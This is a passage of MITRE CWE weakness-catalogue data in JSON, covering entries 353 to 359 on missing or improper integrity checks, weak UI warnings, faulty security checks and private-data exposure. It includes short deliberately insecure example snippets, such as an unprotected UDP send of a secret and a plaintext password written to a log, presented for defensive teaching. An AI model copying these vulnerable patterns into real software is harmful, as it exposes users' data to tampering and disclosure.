Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"353":{"attr":{"@_ID":"353","@_Name":"Missing Support for Integrity Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.","Extended_Description":"If integrity check values or \\"checksums\\" are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol\'s checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"354","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Add an appropriately sized checksum to the protocol, ensuring that data received may be simply validated before it is parsed and used."},{"Phase":"Implementation","Description":"Ensure that the checksums present in the protocol design are properly implemented and added to each message before it is sent."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a request packet is received, and privileged information is sent to the requester:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket rp = new DatagramPacket(rData,rData.length);outSock.receive(rp);InetAddress IPAddress = rp.getAddress();int port = rp.getPort();out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port);outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to add integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"389"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"665"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Failure to Add Integrity Check Value","attr":{"@_Date":"2010-12-13"}}}},"354":{"attr":{"@_ID":"354","@_Name":"Improper Validation of Integrity Check Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate or incorrectly validates the integrity check values or \\"checksums\\" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission.","Extended_Description":"Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the algorithm used for calculating the checksum. It is then a simple matter of implementing the calculation and verifying that the calculated checksum and the received checksum match. Improper verification of the calculated checksum and the received checksum can lead to far greater consequences.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"353","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"Integrity checks usually use a secret key that helps authenticate the data origin. Skipping integrity checking generally opens up the possibility that new data from an invalid source can be injected."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data that is parsed and used may be corrupted."},{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Other"],"Note":"Without a checksum check, it is impossible to determine if any changes have been made to the data after it was sent."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0); serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"#text":"DatagramPacket packet = new DatagramPacket(data,data.length,IPAddress, port);socket.send(sendPacket);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check integrity check value"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"145"}},{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check Integrity Check Value","attr":{"@_Date":"2009-03-10"}}}},"356":{"attr":{"@_ID":"356","@_Name":"Product UI does not Warn User of Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software\'s user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system.","Extended_Description":"Software systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the user downloads a file from an unknown source and attempts to execute the file on their machine, then the application\'s GUI can indicate that the file is unsafe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1055","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1055"},{"Reference":"CVE-1999-0794","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0794"},{"Reference":"CVE-2000-0277","Description":"Product does not warn user when document contains certain dangerous functions or macros.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0277"},{"Reference":"CVE-2000-0517","Description":"Product does not warn user about a certificate if it has already been accepted for a different site. Possibly resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0517"},{"Reference":"CVE-2005-0602","Description":"File extractor does not warn user it setuid/setgid files could be extracted. Overlaps privileges/permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0602"},{"Reference":"CVE-2000-0342","Description":"E-mail client allows bypass of warning for dangerous attachments via a Windows .LNK file that refers to the attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product UI does not warn user of unsafe actions"}},"Notes":{"Note":[{"#text":"Often resultant, e.g. in unhandled error conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Can overlap privilege errors, conceptually at least.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"357":{"attr":{"@_ID":"357","@_Name":"Insufficient UI Warning of Dangerous Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-1099","Description":"User not sufficiently warned if host key mismatch occurs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1099"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient UI warning of dangerous operations"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"358":{"attr":{"@_ID":"358","@_Name":"Improperly Implemented Security Check for Standard","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"290","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":"This is an implementation error, in which the algorithm/technique requires certain security-related behaviors or conditions that are not implemented or checked properly, thus causing a vulnerability."}}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0862","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"},{"Reference":"CVE-2002-0970","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-1407","Description":"Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1407"},{"Reference":"CVE-2005-0198","Description":"Logic error prevents some required conditions from being enforced during Challenge-Response Authentication Mechanism with MD5 (CRAM-MD5).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0198"},{"Reference":"CVE-2004-2163","Description":"Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2005-2298","Description":"Security check not applied to all components, allowing bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2298"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Implemented Security Check for Standard"}},"Notes":{"Note":{"#text":"This is a \\"missing step\\" error on the product side, which can overlap weaknesses such as insufficient verification and spoofing. It is frequently found in cryptographic and authentication errors. It is sometimes resultant.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"359":{"attr":{"@_ID":"359","@_Name":"Exposure of Private Personal Information to an Unauthorized Actor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly prevent a person\'s private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.","Extended_Description":{"xhtml:p":["There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual\'s personal (private) information.  Private personal information may include a password, phone number, geographic location, personal messages, credit card number, etc.  Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product.  An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations.  However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation.","Some types of private information include:","Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry.","Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student\'s personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Government identifiers, such as Social Security Numbers","Contact information, such as home addresses and telephone numbers","Geographic location - where the user is (or was)","Employment history","Financial data - such as credit card numbers, salary, bank accounts, and debts","Pictures, video, or audio","Behavioral patterns - such as web surfing history, when certain activities are performed, etc.","Relationships (and types of relationships) with others - family, friends, contacts, etc.","Communications - e-mail addresses, private messages, text messages, chat logs, etc.","Health - medical conditions, insurance status, prescription records","Account passwords and other credentials"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Privacy violation"},{"Term":"Privacy leak"},{"Term":"Privacy leakage"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Private personal data can enter a program in a variety of ways:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Directly from the user in the form of a password or personal information","Accessed from a database or other data store by the application","Indirectly from a partner or other third party"]},"xhtml:p":"If the data is written to an external location - such as the console, file system, or network - a privacy violation may occur."}},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":{"xhtml:p":"Identify and consult all relevant regulations for personal privacy.  An organization may be required to comply with certain federal and state regulations, depending on its location, the type of business it conducts, and the nature of any private data it handles.  Regulations may include Safe Harbor Privacy Framework [REF-340], Gramm-Leach Bliley Act (GLBA) [REF-341], Health Insurance Portability and Accountability Act (HIPAA) [REF-342], General Data Protection Regulation (GDPR) [REF-1047], California Consumer Privacy Act (CCPA) [REF-1048], and others."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"Carefully evaluate how secure design may interfere with privacy, and vice versa.  Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"pass = GetPassword();...dbmsLog.WriteLine(id + \\":\\" + pass + \\":\\" + type + \\":\\" + tstamp);","xhtml:br":["",""]}},"Body_Text":"The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]},{"Intro_Text":"In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Privacy Violation"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle 